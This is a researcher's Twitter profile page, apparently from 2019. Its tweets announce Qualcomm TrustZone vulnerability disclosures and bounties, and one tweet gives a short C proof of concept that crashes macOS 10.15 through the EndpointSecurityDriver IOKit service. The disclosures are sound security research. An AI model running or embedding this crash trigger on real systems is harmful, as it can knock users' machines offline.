Arash Tohidi

@H4UL4

Computing offsets for {some} OEMs. Vulnerability research on Android, MacOS, and whatever runs on native code.

Helsinki, Finland
Joined: July 2018.

Tweets

  1. Retweeted
    28 Dec 2019

    ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓ 99%

  2. 27 Dec 2019

    A very dumb null-ptr dereference in MacOS 10.15 -> 10.15.2

  3. 27 Dec 2019

    #include <IOKit/IOKitLib.h>

    int main(void) {
        CFMutableDictionaryRef d = IOServiceMatching("EndpointSecurityDriver");
        io_service_t srv = IOServiceGetMatchingService(kIOMasterPortDefault, d);
        io_connect_t con;
        IOServiceOpen(srv, mach_task_self(), 0x41, &con);
        return 0;
    }

  4. Retweeted
    20 Dec 2019

    Science fact of the day: nobody has ever learned C++.

  5. Retweeted

    You can kiss yourself in the mirror, but only on the lips.

  6. Retweeted

    I guess this is what advisories are going to look like in 2020?

  7. 2 Dec 2019

    Continuing the chain of disclosures, CVE-2019-14043 Controlled OOB RW present in Qualcomm Fingerprint TA due to insufficient memory input handling. Follow the cmd handler and take a look at QFP_ExecCalibAndTest(). The OOB read was rated as Medium and the OOB write as High.

  8. 26 Nov 2019

    Disclosing CVE-2019-14042: Multiple OOB Reads in Qualcomm Fingerprint TA. I found these in SDM845 & reported them to QPSI 5 months ago. Still unpatched. Their security impact rated as MEDIUM by QPSI. Follow the TA's cmd handling routine and take a look at exec_open_framework().

  9. 23 Nov 2019

    Just got an email from about a reward for a bug I reported a year ago!

  10. 22 Nov 2019

    These bugs are rated as HIGH impact by Qualcomm Product Security.

  11. 22 Nov 2019

    If you're interested to see the bugs yourself, the bugs are in the command handling function which accepts command and response buffers but fails to validate them correctly.

  12. 22 Nov 2019

    Disclosing CVE-2019-14009: Multiple Memory Corruptions in QPAY TrustZone application found in SDM845. Found and reported to QPSI 6 months ago. Patches have been sent to OEMs by Qualcomm but not yet released.

  13. 30 Oct 2019

    Haven't had time to work more on Apple products recently, but here's a new one...

  14. 26 Oct 2019

    There are usually 2 things politicians use as arguments against things they don't like: 1. Patriotism, nationalism or what we can call "hiding behind the flag" 2. Inapplicable, irrelevant morality concerns & cherry picking Subject being cannabis, immigration, war, minorities...

  15. 30 Aug 2019

    There are also a couple of new TZ bugs (1 duplicate High impact and 2 Medium impact survivors) which hopefully will be addressed in 3 months. These are completely different bugs than the ones I reported to Google 2 months ago. Details of all will come after the fixes.

  16. 30 Aug 2019

    Just got the second 5k bounty from QC for a baseband bug which survived the bounty policies and the chance of being a duplicate. Although have been quite overwhelmed with work recently. Have to take a small break soon.

  17. Retweeted
    23 Aug 2019

    Security Research vs Software Development

  18. 31 Jul 2019

    Finally one of the vendors accepted responsibility of fixing and pushing the updates. Will keep you updated upon release.

  19. 31 Jul 2019

    I have to skip this option because of some NDAs that I have signed. I will push more to force the vendors to fix and release an update.

  20. 30 Jul 2019

    I have found a number of vulns in a widely used product which I have tried to report to the vendor. But there is no communication line with this vendor for fixing vulns. The OEMs who use this product just refer me to another OEM. Hence, we might have to go public. Stay tuned.

